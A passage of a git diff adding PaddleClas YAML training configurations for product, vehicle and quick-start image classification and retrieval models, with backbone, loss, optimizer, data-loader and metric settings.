1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + #eval_mode: "retrieval" + print_batch_step: 10 + use_visualdl: False + + # used for static mode and model export + image_shape: [3, 224, 224] + 
save_inference_dir: ./inference + + #feature postprocess + feature_normalize: False + feature_binarize: "round" + +# model architecture +Arch: + name: "RecModel" + Backbone: + name: "MobileNetV3_large_x1_0" + pretrained: True + class_num: 512 + Head: + name: "FC" + class_num: 50030 + embedding_size: 512 + + infer_output_key: "features" + infer_add_softmax: "false" + +# loss function config for train/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [50, 150] + values: [0.1, 0.01, 0.001] + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 256 + - RandCropImage: + size: 227 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 227 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 227 + - NormalizeImage: + scale: 
1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + +# switch to metric below when eval by retrieval +# - Recallk: +# topk: [1] +# - mAP: +# - Precisionk: +# topk: [1] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Aliproduct.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Aliproduct.yaml new file mode 100644 index 0000000..1210870 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Aliproduct.yaml @@ -0,0 +1,119 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 10 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: classification + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: ResNet50_vd + pretrained: True + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 2048 + class_num: 512 + Head: + name: FC + embedding_size: 512 + class_num: 50030 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.05 + regularizer: + name: 'L2' + coeff: 0.00007 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + 
- NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Inshop.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Inshop.yaml new file mode 100644 index 0000000..2571ea4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_Inshop.yaml @@ -0,0 +1,157 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/product_ResNet50_vd_Aliproduct_v1.0_pretrained.pdparams" + output_dir: ./output/ + device: gpu + save_interval: 10 + eval_during_train: True + eval_interval: 10 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: ResNet50_vd + pretrained: False + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 2048 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 
3997 + margin: 0.15 + scale: 30 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - TripletLossV2: + weight: 1.0 + margin: 0.5 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: MultiStepDecay + learning_rate: 0.04 + milestones: [30, 60, 70, 80, 90, 100] + gamma: 0.5 + verbose: False + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/Inshop/ + cls_label_path: ./dataset/Inshop/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + sampler: + name: PKSampler + batch_size: 64 + sample_per_id: 2 + drop_last: True + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + Query: + dataset: + name: ImageNetDataset + image_root: ./dataset/Inshop/ + cls_label_path: ./dataset/Inshop/query_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: ImageNetDataset + image_root: ./dataset/Inshop/ + cls_label_path: ./dataset/Inshop/gallery_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + 
drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_SOP.yaml b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_SOP.yaml new file mode 100644 index 0000000..484b6ff --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Products/ResNet50_vd_SOP.yaml @@ -0,0 +1,156 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/product_ResNet50_vd_Aliproduct_v1.0_pretrained.pdparams" + output_dir: ./output/ + device: gpu + save_interval: 10 + eval_during_train: True + eval_interval: 10 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + +# model architecture +Arch: + name: RecModel + Backbone: + name: ResNet50_vd + pretrained: False + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 2048 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 11319 + margin: 0.15 + scale: 30 + infer_output_key: features + infer_add_softmax: False + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - TripletLossV2: + weight: 1.0 + margin: 0.5 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: MultiStepDecay + learning_rate: 0.01 + milestones: [30, 60, 70, 80, 90, 100] + gamma: 0.5 + verbose: False + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: VeriWild + image_root: ./dataset/Stanford_Online_Products/ + cls_label_path: ./dataset/Stanford_Online_Products/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - 
RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 64 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: VeriWild + image_root: ./dataset/Stanford_Online_Products/ + cls_label_path: ./dataset/Stanford_Online_Products/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: VeriWild + image_root: ./dataset/Stanford_Online_Products/ + cls_label_path: ./dataset/Stanford_Online_Products/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50.yaml b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50.yaml new file mode 100644 index 0000000..6994789 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + 
use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 431 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0005 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + bbox_crop: True + cls_label_path: "./dataset/CompCars/train_test_split/classification/train_label.txt" + transform_ops: + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] 
+ + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 8 + use_shared_memory: True + + Eval: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + cls_label_path: "./dataset/CompCars/train_test_split/classification/test_label.txt" + bbox_crop: True + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50_ReID.yaml b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50_ReID.yaml new file mode 100644 index 0000000..6aebcbf --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50_ReID.yaml @@ -0,0 +1,155 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 30671 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 
+ Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images/" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/train_list_start0.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: PKSampler + batch_size: 128 + sample_per_id: 2 + drop_last: True + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id_query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + + Gallery: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: 
{} + diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV1_retrieval.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV1_retrieval.yaml new file mode 100644 index 0000000..99f9a12 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV1_retrieval.yaml @@ -0,0 +1,158 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 5 + eval_during_train: True + eval_interval: 1 + epochs: 50 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: MobileNetV1 + pretrained: False + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 1024 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 101 + margin: 0.15 + scale: 30 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - TripletLossV2: + weight: 1.0 + margin: 0.5 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: MultiStepDecay + learning_rate: 0.01 + milestones: [20, 30, 40] + gamma: 0.5 + verbose: False + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: VeriWild + image_root: ./dataset/CUB_200_2011/ + cls_label_path: ./dataset/CUB_200_2011/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] 
+ sampler: + name: DistributedRandomIdentitySampler + batch_size: 64 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + Query: + dataset: + name: VeriWild + image_root: ./dataset/CUB_200_2011/ + cls_label_path: ./dataset/CUB_200_2011/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: VeriWild + image_root: ./dataset/CUB_200_2011/ + cls_label_path: ./dataset/CUB_200_2011/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV3_large_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV3_large_x1_0.yaml new file mode 100644 index 0000000..394f201 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV3_large_x1_0.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 20 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 102 + +# loss 
function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.00375 + warmup_epoch: 5 + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.000001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/ResNet50_vd.yaml 
b/Smart_container/PaddleClas/ppcls/configs/quick_start/ResNet50_vd.yaml new file mode 100644 index 0000000..1b4e844 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/ResNet50_vd.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 102 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 20 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.0125 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + 
use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/HRNet_W18_C_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/HRNet_W18_C_finetune_kunlun.yaml new file mode 100644 index 0000000..6a461cc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/HRNet_W18_C_finetune_kunlun.yaml @@ -0,0 +1,68 @@ +mode: 'train' +ARCHITECTURE: + name: 'HRNet_W18_C' +pretrained_model: "./pretrained/HRNet_W18_C_pretrained" +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True +valid_interval: 1 +epochs: 10 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.00375 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.000001 + +TRAIN: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. 
+ mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/ResNet50_vd_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/ResNet50_vd_finetune_kunlun.yaml new file mode 100644 index 0000000..7fad5ee --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/ResNet50_vd_finetune_kunlun.yaml @@ -0,0 +1,69 @@ +mode: 'train' +ARCHITECTURE: + name: 'ResNet50_vd' +pretrained_model: "./pretrained/ResNet50_vd_pretrained" +load_static_weights: true +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True +valid_interval: 1 +epochs: 20 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.00375 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.000001 + +TRAIN: + batch_size: 20 + num_workers: 1 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. 
+ mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 1 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG16_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG16_finetune_kunlun.yaml new file mode 100644 index 0000000..389a5f3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG16_finetune_kunlun.yaml @@ -0,0 +1,70 @@ +mode: 'train' +ARCHITECTURE: + name: 'VGG16' + params: + stop_grad_layers: 5 +pretrained_model: "./pretrained/VGG16_pretrained" +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True 